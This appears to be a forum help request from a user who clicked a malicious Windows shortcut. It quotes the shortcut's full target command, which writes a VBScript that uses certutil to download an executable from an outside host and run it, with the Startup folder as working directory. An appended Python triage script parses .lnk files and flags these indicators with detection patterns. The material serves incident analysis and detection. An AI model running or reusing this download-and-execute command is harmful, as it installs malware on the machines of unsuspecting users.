
I received a link file masquerading as a text file. By mistake I clicked it, and suddenly a command prompt opened. Surprised at the unexpected behavior, I closed that window. Upon inspecting the file, it had a .lnk extension. While a normal .lnk file is only a few bytes in size, this one was a few hundred MB.

Inspecting the details of the .lnk file, the target field contained the following command:

%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?di1708e9xmgN9OFQ=amusers_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"

while the "Start in" field contained:

"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

I need some help understanding what this code fragment does and, if possible, how to check whether anything bad has happened and how to undo the changes.

Windows 8 system, if that is in any way relevant. Let me know if any other information is needed.

Frash

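An added triage example, not part of the question or any answer: a Python script that walks the StringData section of a .lnk file, pulls out the target arguments and the "Start in" directory, and flags the indicators present in the shortcut described above (certutil -urlcache used as a downloader, a .vbs dropped via echo redirection, a per-user .exe launched, and the Startup folder as working directory). The sample shortcut is constructed inside the script with a placeholder host in place of the real URL; the function and constant names are my own.

```python
import re
import struct
# LinkFlags bits (MS-SHLLINK 2.1.1): they decide which optional structures follow the 76-byte header
HAS_IDLIST, HAS_LINKINFO, HAS_WORKDIR, HAS_ARGS, IS_UNICODE = 0x01, 0x02, 0x10, 0x20, 0x80
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", HAS_WORKDIR),
                 ("arguments", HAS_ARGS), ("icon", 0x40))  # StringData order in the file

def parse_lnk_strings(data):
    """Walk a .lnk and return its StringData fields (target arguments, working dir, ...)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link header")
    flags, pos = struct.unpack_from("<I", data, 0x14)[0], 0x4C
    if flags & HAS_IDLIST:        # IDListSize (2 bytes) + the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:      # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, fields = (2 if flags & IS_UNICODE else 1), {}
    for key, bit in STRING_FIELDS:
        if flags & bit:           # CountCharacters (2 bytes), then the unterminated string
            count = struct.unpack_from("<H", data, pos)[0] * width
            fields[key] = data[pos + 2:pos + 2 + count].decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count
    return fields
# Patterns taken from the shortcut in the question, matched against the target arguments
INDICATORS = (
    (r"certutil\S*\s+-urlcache", "certutil -urlcache used as a downloader"),
    (r"https?://", "remote URL embedded in the shortcut"),
    (r'echo\s.*>\s*"?[^"&]*\.vbs', "VBScript written to disk via echo redirection"),
    (r"%USERNAME%\.exe", "downloaded executable named after the user is launched"),
)

def assess_lnk(fields):
    """Return findings for one parsed shortcut; an empty list means nothing matched."""
    args, workdir = fields.get("arguments", ""), fields.get("working_dir", "")
    findings = [why for pat, why in INDICATORS if re.search(pat, args, re.IGNORECASE)]
    if re.search(r"\\Start Menu\\Programs\\Startup", workdir, re.IGNORECASE):
        findings.append("working directory is the Startup folder, so the payload re-runs at logon")
    return findings

# Constructed sample modelled on the question; the host is a placeholder, not the real URL
SAMPLE_ARGS = ('/c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""'
               '&certutil -urlcache -f https://malicious-host.invalid/x ""%USERNAME%.exe""'
               '&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"')
SAMPLE_DIR = r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
LNK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"

def build_sample_lnk(working_dir=SAMPLE_DIR, arguments=SAMPLE_ARGS):
    # Minimal shortcut: header plus Unicode WorkingDir and Arguments, no IDList or LinkInfo
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_WORKDIR | HAS_ARGS | IS_UNICODE).ljust(0x4C, b"\0")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (working_dir, arguments))
    return header + body
```

To check a system, read each .lnk under the Startup folder with open(path, "rb") and pass the bytes to parse_lnk_strings; any finding on a shortcut you did not create is reason to preserve that file, the %USERNAME%.vbs and %USERNAME%.exe it names, and the certutil URL cache for analysis before cleaning up.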